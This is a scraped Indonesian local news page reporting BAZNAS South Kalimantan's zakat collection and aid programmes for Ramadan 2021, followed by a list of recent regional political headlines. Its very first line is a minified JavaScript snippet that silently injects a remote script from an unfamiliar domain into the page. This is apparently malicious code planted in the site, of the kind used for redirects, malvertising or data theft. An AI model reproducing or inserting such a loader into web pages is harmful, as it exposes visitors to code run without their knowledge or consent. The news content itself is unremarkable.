(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

BAZNAS Kalsel Siapkan Banyak Program Unggulan di Bulan Suci Ramadhan


KANALKALIMANTAN.COM BANJARBARU – Menyambut Ramadan 1442 hijriah, Badan Amil Zakat Nasional (BAZNAS) Kalimatan Selatan telah menyiapkan sejumlah program inovasi demi misi menyentuh semua lapisan masyarakat.

Hal tersebut diungkapkan Ketua Pelaksana Ramadan BAZNAS Kalsel, Sadam Nur Hidayat, bahwa Ramadhan ada banyak program untuk masyarakat. Terlebih di masa pandemi Covid 19 dan pasca bencana banjir di Kalsel awal tahun tadi.

“Kami akan memberikan pelayanan kemudahan untuk berbayar zakat bagi masyarakat. Mulai dari bayar zakat secara digital hingga tatap muka,” ujarnya saat konfrensi pers BAZNAS Kalsel di Roditha Hotel Banjarbaru, Senin (12/4/2021).

BAZNAS Kalsel, kata Sadam, telah bekerjasama dengan website, e-commerce terkenal, dan media flatfom non komersil. Meski begitu masyarakat Kalsel yang budayanya yang lebih merasa afdol saat berzakat dengan bertemu Amil Zakat tetap akan dilayani dengan banyaknya konter zakat di mall, perkantoran, dan ruang publik.

Baca juga : Patroli hingga Penyuluhan Siaran Radio, Operasi Keselamatan Intan Satlantas Polres HSU

” Ramadhan ini penyaluran zakat BAZNAS Kalsel juga akan diprioritaskan untuk penanganan Covid 19 dan bantuan untuk korban banjir di Hulu Sungai Tengah, nanti akan ada ibadah muslim kit untuk korban banjir di HST, bahan pangan keluarga terdampak Covid 19, makanan sahur dan berbuka bagi masyarakat, dan pembersihan masjid dan Musala,” jelas Sadam kepada awak media.

Program bantuan pangan untuk masyarakat terdampak Pandemi Covid 19 ini tambah Sadam disalurkan kepada semua masyarakat yang terdampak karena akan disalurkan oleh BAZNAS Kabupaten Kota di Kalsel.

Selain itu juga ada program Ramadan sehat ceria dengan adanya penyuluhan kesehatan, pengobatan gratis dan pemberian pangan bergizi. Bantuan ini akan disalurkan kepada kawasan masyarakat rentan miskin.

BAZNAS Kalsel terang Sadam juga sudah sudah membina pelaku UMKM yang dibina BAZNAS Kalsel untuk bisa berjualan dalam pasar online Ramadan. Pelaku UMKM diajarkan untuk dapat berjualan di aplikasi antar jemput barang atau makanan yang mereka jual.

Baca juga : Emban Misi Kemanusian, Borneo Rescue Kirim 6 Relawan ke NTT

Sementara ketua BAZNAS Kalsel periode 2021 hingga 2026, Irhamsyah Safari mengatakan pengumpulan zakat saat Ramadan biasanya akan meningkat hingga tiga kali lipat dari bulan-bulan lain.

Sedangkan distribusi zakat biasanya dimaksimalkan untuk menyentuh langsung kepada mustahiq. Kita ingin Ramadan ini gerakan cinta zakat lebih sampai ke masyarakat,” ujarnya.(Kanalkalimantan.com/al)

 

Reporter : Al
Editor : Cell

 

 


Al Ghifari

Recent Posts

5 Nama Pendaftar Bacalon Pilwali Banjarbaru ke PDIP

KANALKALIMANTAN.COM, BANJARBARU - Lima buah formulir pendaftaran diambil oleh lima orang bakal calon Pilkada 2024… Read More

5 jam ago

Acil Odah Resmi Lamar Golkar Maju Pilgub Kalsel 2024

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hj Raudatul Jannah alias Acil Odah untuk maju pada kontestasi Pemilihan… Read More

5 jam ago

Golkar Banjarbaru Buka Penjaringan Bakal Calon Wali Kota

KANALKALIMANTAN.COM, BANJARBARU - DPD Partai Golkar Kota Banjarbaru membuka pendaftaran bakal calon Wali Kota dan… Read More

6 jam ago

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

9 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

10 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

21 jam ago

This website uses cookies.